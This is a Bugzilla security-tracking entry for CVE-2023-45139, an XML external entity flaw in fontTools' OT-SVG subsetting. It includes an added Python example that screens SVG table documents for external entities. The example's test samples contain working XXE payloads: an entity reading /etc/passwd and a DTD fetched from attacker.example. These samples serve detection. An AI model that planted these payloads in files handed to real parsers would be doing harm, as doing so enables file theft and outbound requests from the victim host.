Bug 2257808 (CVE-2023-45139)
| Summary: | CVE-2023-45139 fonttools: XML External Entity Injection (XXE) Vulnerability | | |
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | TEJ RATHI <trathi> |
| Component: | vulnerability | Assignee: | Product Security <prodsec-ir-bot> |
| Status: | NEW --- | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | | |
| Version: | unspecified | Keywords: | Security |
| Target Milestone: | --- | | |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | | | |
| Fixed In Version: | fonttools 4.43.0 | Doc Type: | If docs needed, set a value |
| Doc Text: | A flaw was found in the subsetting module of FontTools. When the subsetter processes a candidate font in OT-SVG format, it parses the documents stored in the font's SVG table as XML, and that parser resolves external entities. A crafted font can therefore declare an external entity whose resolution reads arbitrary files from the filesystem on which FontTools is running, or issues web requests from that host. The issue is fixed in fonttools 4.43.0. | | |
| Story Points: | --- | | |
| Clone Of: | | Environment: | |
| Last Closed: | | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | 2257809, 2257810, 2257811 | | |
| Bug Blocks: | 2257812 | | |
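The Doc Text above describes the mechanism: the SVG table of an OT-SVG font is handed to an XML parser that resolves external entities, so a `<!ENTITY ... SYSTEM "...">` declaration in a glyph document becomes a file read or an outbound request. The following is an added example, not code from fontTools or from this bug report, showing how to screen such a document for external references before it is parsed. It uses only the Python standard library's expat binding and makes no claim about how fontTools' own subsetter configures its parser; the three SVG documents, the `file:///etc/passwd` path and the `attacker.example` host are constructed for the example.

```python
"""Screen an OT-SVG font's SVG table document for XML external entities
before parsing it.  Added example, not code from fontTools: it uses only the
standard library's expat binding and fetches nothing."""
import xml.parsers.expat
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Constructed samples (not taken from a real font).  Each is the kind of SVG
# document an OT-SVG font stores in its SVG table, one per glyph range.

# Internal DTD subset declares an external general entity.  A parser that
# resolves entities reads the file and splices it into the glyph's text.
XXE_FILE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <g id="glyph1"><text>&xxe;</text></g>
</svg>
"""

# External DTD subset: a resolving parser fetches this URL from the host and
# can then pick up further entity declarations from whatever it receives.
XXE_DTD_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE svg SYSTEM "http://attacker.example/evil.dtd">
<svg xmlns="http://www.w3.org/2000/svg">
  <g id="glyph1"><path d="M0 0h10v10H0z"/></g>
</svg>
"""

# Benign document: no DOCTYPE at all, which is all a glyph document needs.
BENIGN_DOC = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <g id="glyph1"><path d="M0 0h10v10H0z"/></g>
</svg>
"""


class UnsafeSvgDocument(ValueError):
    """Raised when an SVG table document references anything outside itself."""


def find_external_references(doc: bytes) -> List[Tuple[str, str, Optional[str]]]:
    """Return (kind, name, system_id) for every external DTD subset and every
    external entity declared in doc, without fetching any of them.

    kind is 'doctype' for an external DTD subset and 'entity' for an external
    entity declared in the internal subset.
    """
    found: List[Tuple[str, str, Optional[str]]] = []
    parser = xml.parsers.expat.ParserCreate()
    # Never read an external DTD subset or an external parameter entity.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def start_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            found.append(("doctype", name, system_id))

    def entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # For an external entity expat reports value=None and a system/public id.
        if system_id is not None or public_id is not None:
            found.append(("entity", name, system_id))

    def external_entity_ref(context, base, system_id, public_id):
        # expat asks us to resolve a referenced external entity.  Returning 1
        # without creating a sub-parser tells it to continue with no content,
        # so nothing is read from disk or the network.
        return 1

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.Parse(doc, True)
    return found


def is_safe_svg_document(doc: bytes) -> bool:
    """True when doc declares no external DTD subset and no external entity."""
    return not find_external_references(doc)


def parse_svg_table_document(doc: bytes) -> ET.Element:
    """Parse one SVG table document, refusing any that declares an external
    DTD subset or external entity, and return its root element."""
    refs = find_external_references(doc)
    if refs:
        raise UnsafeSvgDocument(f"external references in SVG table document: {refs}")
    # ElementTree's parser does not resolve external entities, so parsing an
    # already screened document cannot reach the filesystem or the network.
    return ET.fromstring(doc)


if __name__ == "__main__":
    for label, doc in [("file entity", XXE_FILE_DOC),
                       ("external dtd", XXE_DTD_DOC),
                       ("benign", BENIGN_DOC)]:
        try:
            root = parse_svg_table_document(doc)
            print(f"{label}: parsed {root.tag}")
        except UnsafeSvgDocument as exc:
            print(f"{label}: rejected ({exc})")
```

In a subsetter this screen would run on each document in the table before it is given to whatever XML library does the real parsing. A stricter and simpler policy is to reject any document that carries a DOCTYPE at all, since glyph SVGs never need one; that also removes internal entity expansion, which this check deliberately leaves alone.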
Description
TEJ RATHI
2024-01-11 06:19:53 UTC
Created fonttools tracking bugs for this issue:
Affects: fedora-all [bug 2257809]

Created rst2pdf tracking bugs for this issue:
Affects: fedora-all [bug 2257810]

Created smc-suruma-fonts tracking bugs for this issue:
Affects: fedora-all [bug 2257811]